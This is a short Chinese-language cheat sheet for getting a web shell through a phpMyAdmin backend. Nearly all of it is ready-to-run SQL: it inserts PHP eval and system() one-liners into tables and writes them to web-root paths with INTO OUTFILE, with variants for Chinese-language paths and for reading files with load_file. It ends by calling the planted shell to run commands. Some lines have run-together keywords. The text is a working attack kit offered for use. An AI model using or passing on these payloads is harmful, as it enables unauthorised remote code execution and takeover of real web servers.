[PhpMyAdmin后台拿Shell]
CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
INSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('');
select xiaoma1 from xiaoma INTO OUTFILE 'E:/wamp/www/7.php';
以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php一句话连接密码:xiaomaCreate TABLE xiaoma (xiaoma1 text NOT NULL);
Insert INTO xiaoma (xiaoma1) VALUES('<?phpeval($_POST[xiaoma])?>');
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';
Drop TABLE IF EXISTS xiaoma;
create database wutongyu(这个为数据库名称).
use wutongyu (连接数据库)
create table shell(code text) (建立表shell,字段code为文本型数据)
insert into shell(code) values ('<?php@eval($_POST['c']);?>'); (插入一句话,密码为C)
select * from shell into outfile"D:\\detai\\AppServ\\www\\phpMyAdmin2\\shell.php"(导出shell到绝对路径) PhpMyAdmin导出WebShell至中文路径
set character_set_client='gbk';
set character_set_connection='gbk';
set character_set_database='gbk';
set character_set_results='gbk';
set character_set_server='gbk';
select '<?php eval($_POST[cmd]);?>' into outfile'd:\www\网站\mm.php';
读取文件内容:select load_file('E:/xamp/www/s.php');
写一句话: select '<?php @eval($_POST[cmd])?>'INTOOUTFILE 'E:/xamp/www/xiaoma.php'
cmd执行权限: select '<?php echo\'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\';?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
select load_file('E:/xamp/www/xiaoma.php');
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo\'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir